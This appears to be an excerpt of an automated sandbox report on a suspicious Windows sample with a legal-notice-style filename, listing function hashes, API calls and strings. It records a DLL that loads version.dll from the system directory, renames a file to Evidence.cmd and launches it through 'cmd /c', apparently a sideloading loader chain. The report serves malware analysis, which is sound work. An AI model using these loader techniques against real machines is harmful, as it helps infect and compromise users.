Snapshot File: hcaresult_13_2_14fa000_unarchiver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 703f642edcd8de148cd1af77cd1c589e1bb0025893e98e8117580b369669af88
Instruction ID: a60e6b65c3570a638ce7f4eabd4ac3c27386af693dae34353036c86234becf80
Opcode Fuzzy Hash: 703f642edcd8de148cd1af77cd1c589e1bb0025893e98e8117580b369669af88
Instruction Fuzzy Hash: 44018F759042409FDB10DF29D985B66FBE4DF04720F18C4AFDD0A8B352D379E444CAA2

Function 054B02C0 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c377da7c12b8279114c3857c07489d8cd29cba298882abbfd2b90a2c5c90c3ed
Instruction ID: ae00980597437861bde93626c863702fe1e7bbd179f2c806b8ae0d401091917e
Opcode Fuzzy Hash: c377da7c12b8279114c3857c07489d8cd29cba298882abbfd2b90a2c5c90c3ed
Instruction Fuzzy Hash: 53B16134601110CFD765DB65E858AAF77BAFF8C341F1292A9D906AB364DF349C05CBA0

Function 054B0799 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4173830914a9108f996c1ca8eac280428d4471ee6fb69232f80de47abd096eb0
Instruction ID: c034e9ea8a5861079502669e63339fcb3f3db1d171f5145214e3ffb8e032cbd3
Opcode Fuzzy Hash: 4173830914a9108f996c1ca8eac280428d4471ee6fb69232f80de47abd096eb0
Instruction Fuzzy Hash: 95A16C70B012008FDB15DBB494597BF77A7FB88309F158069DA16AB3A5DF788C42CBA1

Function 054B0C99 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 235a80df55600bc858e7896f5018d2dfe5ff572b1faef25f7ab93f619bb27087
Instruction ID: 5b536ebd689573e6dd5479d412c91ab100794309943cb51b2a8e39d9f7847e77
Opcode Fuzzy Hash: 235a80df55600bc858e7896f5018d2dfe5ff572b1faef25f7ab93f619bb27087
Instruction Fuzzy Hash: 00213570B006104FC715EB768854AAF7AEBAFCA204B14443DD65ADB392DF79DD0287A2

Function 054B0CA8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442d08eea08efe3be9352833fe1c62d1c2a0f48eaa8861ae55a014c375ec3b33
Instruction ID: e83ddcbd98091c1d81f1f71ac6622c2a2c5025005042586a0b7f4b13dccfb6d4
Opcode Fuzzy Hash: 442d08eea08efe3be9352833fe1c62d1c2a0f48eaa8861ae55a014c375ec3b33
Instruction Fuzzy Hash: 7F2126707006144BC714EB368854AAFB7E7AFC9204B54883DC15ADB391DF79E9068792

Function 054B0B8F Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2685ab6e9eeb2b00a3fd8c1340c686147b8537b43fb534a8c35dff939ea34d
Instruction ID: ee10dcfe9930d10838e37c63b8aadbdbce6c48a1c12b93187dcf9c8bb4e3ceb8
Opcode Fuzzy Hash: 2b2685ab6e9eeb2b00a3fd8c1340c686147b8537b43fb534a8c35dff939ea34d
Instruction Fuzzy Hash: BB119D31A10118AFCB04DBB4D8489AF7BF6BF8D214B064175E606E7271EF719C168790

Function 054B0BA0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399d6abb5c870ed539383f77017cbcc93f955824afa69a739dacfb363ad4d23e
Instruction ID: fa36ca129c272b4f32930038ba493b1c9b7b8d2ddb8455cd2523d79ede097df3
Opcode Fuzzy Hash: 399d6abb5c870ed539383f77017cbcc93f955824afa69a739dacfb363ad4d23e
Instruction Fuzzy Hash: DB114F32A10118AFCB14DBB4D8489AF7BF6FF8D214B064475E606E7275EF719C058791

Function 019B0810 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 187cdfdda61a534279e6e3992bfa9939c5163cb1cbf9db8aa6d7422511a8dc21
Instruction ID: 44a1675f7e323eb0445804a2a8809c99f1d4fafbb143416d35d55726ca1c1f92
Opcode Fuzzy Hash: 187cdfdda61a534279e6e3992bfa9939c5163cb1cbf9db8aa6d7422511a8dc21
Instruction Fuzzy Hash: 9701A2B24092406FD301DF55EC45C57BBFCDF86564F08C4AAFC488B201E225F9188BB2

Function 019B05E7 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af144a8d1bb6e69b7c866e0fff5b315e14edc39b2f53c2163b87dc2e90249490
Instruction ID: 1007e59ad5a484ab3d4cbce468ff8adf052110974ef1baf8622ba204584053ea
Opcode Fuzzy Hash: af144a8d1bb6e69b7c866e0fff5b315e14edc39b2f53c2163b87dc2e90249490
Instruction Fuzzy Hash: 8AF044B65097806FD7118F16AC41863FFE8EE86660709C49FEC498B652D229A908CB76

Function 019B082E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa9106116b9a3dc60d7830eaebe969f3be14b2fbbd090634b1dcf086d16ed50
Instruction ID: 0565812e7376b1a4dff3aa422d5a9175c9d1da39d673f6e1c1a04c2edff94083
Opcode Fuzzy Hash: bfa9106116b9a3dc60d7830eaebe969f3be14b2fbbd090634b1dcf086d16ed50
Instruction Fuzzy Hash: 3FF082B29452046B9200DF55ED46866F7ECDF84561F08C56AEC088B300E276AA154AE2

Function 054B0C50 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e6c52442f65661af70db6c25e837f7065b8aafced7835798a373dd1dc57f41
Instruction ID: 22cf0668e8574251220101fd4ea06a0d467c8a2570f7e6596f27e6f6e593cec3
Opcode Fuzzy Hash: a7e6c52442f65661af70db6c25e837f7065b8aafced7835798a373dd1dc57f41
Instruction Fuzzy Hash: 1BE0D831F143141FCB44DBF8585469E7FF6DBC5264B42447AC004D7242EF348C428790

Function 019B0606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1702453473.00000000019B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 019B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_19b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e2ac5f08fd5e3e3a9d2a85c603df7bafa7221af6b91362ba34def37354f9e7
Instruction ID: 8e2102a7bca48531da1df598f0ee7e4a12f70ac7bef6b31169f3617d2d3c8988
Opcode Fuzzy Hash: d6e2ac5f08fd5e3e3a9d2a85c603df7bafa7221af6b91362ba34def37354f9e7
Instruction Fuzzy Hash: 9BE092B6A046005B9650DF0AEC41462F7D8EB88630708C47FDC0D8B701E639F504CAA5

Function 054B0C60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e43dd15ee76c3c4d6b17776681486d04fc68eb8bf8ca27b8a4c7dd06d329f8
Instruction ID: f41d45c1e7b97b96407977493549d3b9ada72c4c1a420410bb6ef6d2bc5432f0
Opcode Fuzzy Hash: 88e43dd15ee76c3c4d6b17776681486d04fc68eb8bf8ca27b8a4c7dd06d329f8
Instruction Fuzzy Hash: 03D01231F042182B8B48DBB958546AE7BEA9BC4154B564479D109D7341FE359D418790

Function 054B0DD1 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d09551f8777813fa3c56b146b225c75453bf4f19d434dba143ec9c05b066dbf
Instruction ID: cb7770bb29f44d1ebb4262b7d736ddac5f703b047af9c8959195481f58a6dfff
Opcode Fuzzy Hash: 4d09551f8777813fa3c56b146b225c75453bf4f19d434dba143ec9c05b066dbf
Instruction Fuzzy Hash: B6E086301843404FC70587B4981C9E637A96BC1314F4581A684088B262D7A88881C650

Function 014F23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1701959677.00000000014F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14f2000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a862917cef19290a4459cb93a3ec491c3c78588c860b94c5e7b0c801cf39f42
Instruction ID: c210e8bc8cfa90f521b1302313e732cae39641e8888ad86bdc652853c022cec9
Opcode Fuzzy Hash: 4a862917cef19290a4459cb93a3ec491c3c78588c860b94c5e7b0c801cf39f42
Instruction Fuzzy Hash: F7D02EB92006904FE3138E1CC1A4F863BE8AB40704F0A00FEE8008B373C3A8D481C200

Function 014F23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1701959677.00000000014F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_14f2000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58688a6043844ea5ef47c50eb36eabd7bbbccb6e31c34b123e3d6b34c6fac5a6
Instruction ID: 209af574100c0361cf579216690648a4d1812554d471e39dbaa4bb17f6f46448
Opcode Fuzzy Hash: 58688a6043844ea5ef47c50eb36eabd7bbbccb6e31c34b123e3d6b34c6fac5a6
Instruction Fuzzy Hash: 18D05E742006814BDB15DE2CC2D4F5A37D8AB40714F1A44EDAD108B372C7B8D8C1CA00

Function 054B0DE0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1703018732.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_54b0000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd97447f0bcf95684925ff9759b5c233b42f705a05d655bdc07fb68ae0b62c24
Instruction ID: fc32ba78abfd226ffb38a36aa00e5fce86d0731c5ca737cb466918b74507c54c
Opcode Fuzzy Hash: cd97447f0bcf95684925ff9759b5c233b42f705a05d655bdc07fb68ae0b62c24
Instruction Fuzzy Hash: 91C012303042048FD704A7B8D81DAA7739A6BC4305F49C0A5850D0B361DEB4EC40C6D0

Analysis Process: Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.exePID: 3268, Parent PID: 4992COMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.7%
Total number of Nodes:	77
Total number of Limit Nodes:	1

Executed Functions

Function 73D61090 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 73D610A7

Part of subcall function 73D61050: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000104,?,00000000,73D610CA,?,73D610CA,?,00000104,%s\version.dll,?), ref: 73D61073

LoadLibraryA.KERNELBASE(?), ref: 73D610D4
GetProcAddress.KERNEL32(00000000,73D630CC), ref: 73D610EE

Strings

%s\version.dll, xrefs: 73D610B4

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: AddressDirectoryLibraryLoadProcSystem__stdio_common_vsprintf
String ID: %s\version.dll
API String ID: 3198012587-940674477
Opcode ID: 5de5300d80e8fba68bd9b23fb231d9648fc45f4745cd586e5daa89f8a850f33a
Instruction ID: 3a0be65e3f6a19e603d546f3b5d02531e4f4b844aaf7fb6f1e051c6e2a00cead
Opcode Fuzzy Hash: 5de5300d80e8fba68bd9b23fb231d9648fc45f4745cd586e5daa89f8a850f33a
Instruction Fuzzy Hash: 59F0A473800618EBDB20EAA5CC49BD5B7BCEB14394F0104A5EAB8A7111D7F569988FB1

Function 73D61150 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 99
processfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73D61090: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 73D610A7
Part of subcall function 73D61090: LoadLibraryA.KERNELBASE(?), ref: 73D610D4
Part of subcall function 73D61090: GetProcAddress.KERNEL32(00000000,73D630CC), ref: 73D610EE

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 73D61178

Part of subcall function 73D61010: __stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000104,?,00000000,73D6119A,?,73D6119A,?,00000104,%s\,?), ref: 73D6102F

GetFileAttributesW.KERNELBASE(?), ref: 73D611FB
MoveFileW.KERNEL32(?,?), ref: 73D6121A
memset.VCRUNTIME140(?,00000000), ref: 73D6125F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 73D61295
CloseHandle.KERNEL32 ref: 73D612A2
CloseHandle.KERNEL32(?), ref: 73D612AC
ExitProcess.KERNEL32 ref: 73D612B4

Strings

cmd /c "%s", xrefs: 73D61230
D, xrefs: 73D61254
%s\, xrefs: 73D61186
%s\Evidence., xrefs: 73D611AA
%s\Evidence.cmd, xrefs: 73D611D1

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: CloseDirectoryFileHandleProcess$AddressAttributesCreateCurrentExitLibraryLoadMoveProcSystem__stdio_common_vswprintfmemset
String ID: %s\$%s\Evidence.$%s\Evidence.cmd$D$cmd /c "%s"
API String ID: 967844197-1087385400
Opcode ID: dd58c816e5b6ca866a15a759647900f6d91d172b106c8887c624dc8be4ecc86f
Instruction ID: a86f446b202944d6b80cc9cc9bd50c1233ec9b23b3344e9a42bc3e1d030d80cc
Opcode Fuzzy Hash: dd58c816e5b6ca866a15a759647900f6d91d172b106c8887c624dc8be4ecc86f
Instruction Fuzzy Hash: F431A4B2508744EBE320EAB1CC45F9A73ECAB44784F400D19FAE9D5094F776D2688B36

Function 73D6141F Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 73D61466
___scrt_uninitialize_crt.LIBCMT ref: 73D61480

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: bc7c304da7694419fcdb4a63ae3a9d9a8ab225d1429bd1316766819550ac5f57
Instruction ID: 5f1934e1efc0ecb4d0a5cccffb0d7c45aee28f0d4c52f466db95b99428b45c74
Opcode Fuzzy Hash: bc7c304da7694419fcdb4a63ae3a9d9a8ab225d1429bd1316766819550ac5f57
Instruction Fuzzy Hash: 6F41C472D04725EFEB119F65C850B9EBAB9EB40AE1F104119E83AB7390D7389D058BB0

Function 73D614CF Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 73D6150C
dllmain_crt_dispatch.LIBCMT ref: 73D61523
dllmain_raw.LIBCMT ref: 73D6156B
dllmain_crt_dispatch.LIBCMT ref: 73D6157E
dllmain_raw.LIBCMT ref: 73D61591

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: d4ae0ae19f6fa076ade7412cd849bcc27b8e34c4d65689024d2f85254d5035d7
Instruction ID: f0a63bb88ae7dabf28e644a1c66b09b7219aedac33dcc8a3ff74bfed07aa4fb8
Opcode Fuzzy Hash: d4ae0ae19f6fa076ade7412cd849bcc27b8e34c4d65689024d2f85254d5035d7
Instruction Fuzzy Hash: 53216572D00225EFDB128F55CC90B6FBAB9EB84AE0B054119F83777350D7358D418BA0

Non-executed Functions

Function 6FDF57D7 Relevance: 71.2, APIs: 25, Strings: 15, Instructions: 1201COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 6FDF5825
operator+.LIBVCRUNTIME ref: 6FDF583F
DName::operator+.LIBCMT ref: 6FDF596D
DName::operator+.LIBCMT ref: 6FDF598A

Part of subcall function 6FDF6AC1: DName::DName.LIBVCRUNTIME ref: 6FDF6B04

DName::operator+.LIBCMT ref: 6FDF5A3E
DName::operator+.LIBCMT ref: 6FDF5A4D

Part of subcall function 6FDFB021: DName::operator+.LIBCMT ref: 6FDFB065
Part of subcall function 6FDFB021: DName::operator+.LIBCMT ref: 6FDFB071
Part of subcall function 6FDFB021: DName::operator+.LIBCMT ref: 6FDFB0EC
Part of subcall function 6FDFB021: DName::operator+=.LIBCMT ref: 6FDFB12F

DName::operator+.LIBCMT ref: 6FDF59D9

Part of subcall function 6FDF5630: DName::operator=.LIBVCRUNTIME ref: 6FDF5651

Part of subcall function 6FDF55D8: shared_ptr.LIBCMT ref: 6FDF55F4

Part of subcall function 6FDF70CC: shared_ptr.LIBCMT ref: 6FDF7172

DName::operator+.LIBCMT ref: 6FDF5FB7
DName::operator+.LIBCMT ref: 6FDF5FD3
DName::operator+.LIBCMT ref: 6FDF6272

Part of subcall function 6FDF5503: DName::operator+.LIBCMT ref: 6FDF5524

Strings

/, xrefs: 6FDF611B
`template static data member destructor helper', xrefs: 6FDF6114
virtual , xrefs: 6FDF634E
[thunk]:, xrefs: 6FDF64DB
`local static destructor helper', xrefs: 6FDF605D
public: , xrefs: 6FDF6468
static , xrefs: 6FDF6251
}' , xrefs: 6FDF59C1, 6FDF5DF3
`vtordispex{, xrefs: 6FDF5D04
extern "C" , xrefs: 6FDF6518
`template static data member constructor helper', xrefs: 6FDF60B8
private: , xrefs: 6FDF63D1
`vtordisp{, xrefs: 6FDF5D8D
protected: , xrefs: 6FDF6422
`adjustor{, xrefs: 6FDF5DCF

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: Name::operator+$NameName::shared_ptr$Name::operator+=Name::operator=operator+
String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
API String ID: 848932493-2884338863
Opcode ID: d0980f3199cce55c1fdeee494672e48c3981323fb7c5ad9e2b2c4c6eafa2452a
Instruction ID: 26bcab9f34c10bac461b1ca5643c7501be57111f8a482276603a8ee8a49f13d8
Opcode Fuzzy Hash: d0980f3199cce55c1fdeee494672e48c3981323fb7c5ad9e2b2c4c6eafa2452a
Instruction Fuzzy Hash: 03926276E566199BEB44CFA8CC91FEE77B4AF05314F05423AE512EB2C0DB28F5068B50

Function 73D619D9 Relevance: 9.1, APIs: 6, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 73D619E5
memset.VCRUNTIME140(?,00000000,00000003), ref: 73D61A0B
memset.VCRUNTIME140(?,00000000,00000050), ref: 73D61A95
IsDebuggerPresent.KERNEL32 ref: 73D61AB1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73D61ACA
UnhandledExceptionFilter.KERNEL32(?), ref: 73D61AD4

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: 8f6533e49a887be98e69c614662f2c2ff5011cb4d32627b75ff325dd33714196
Instruction ID: 5a695ab30b6b2465f52619bd2d750e79f97040b4d46781af4ab63049dbea5cd8
Opcode Fuzzy Hash: 8f6533e49a887be98e69c614662f2c2ff5011cb4d32627b75ff325dd33714196
Instruction Fuzzy Hash: A53147B5D01318DBDB20DFA1C9487CDBBB8BF08340F1041AAE40DAB250EB719A85CF55

Function 6FDFF2EB Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6FDFF301

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d33d975020a6f4a4c096ce11d156ce68d8c3e65d65468195657476235b448beb
Instruction ID: f999fa9beca5ab5b4a74f0d0f3eff1515a5093def58d9e1015fc4278dbdcdc02
Opcode Fuzzy Hash: d33d975020a6f4a4c096ce11d156ce68d8c3e65d65468195657476235b448beb
Instruction Fuzzy Hash: F8A16AB2D01B05CBDB04CF94C481B99BBF6FB5A728F25822EE455EF240D339A461CB59

Function 73D61BC7 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 73D61BDD

Memory Dump Source

Source File: 00000012.00000002.1697594811.0000000073D61000.00000020.00000001.01000000.00000008.sdmp, Offset: 73D60000, based on PE: true

Associated: 00000012.00000002.1697568301.0000000073D60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697616754.0000000073D63000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1697658027.0000000073D65000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_73d60000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ad78e005a02b9a6300eb55d04156b6c8ce07049088e22a177e630f9e3d8af519
Instruction ID: 16fc61e466c318e5ab2e06efacb311e24765dafa3ea53c81f673f918d79c44fe
Opcode Fuzzy Hash: ad78e005a02b9a6300eb55d04156b6c8ce07049088e22a177e630f9e3d8af519
Instruction Fuzzy Hash: 3EA1BDB3904A24CFCB04DFA6C58579DBBF5FB487A0F28812AD42AEB280D3349454CF64

Function 6FDFE530 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true

Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: fbe11e0d38f77faa2a9166aab1c14fd81aed84a444bf21911cb2bd84c934c964
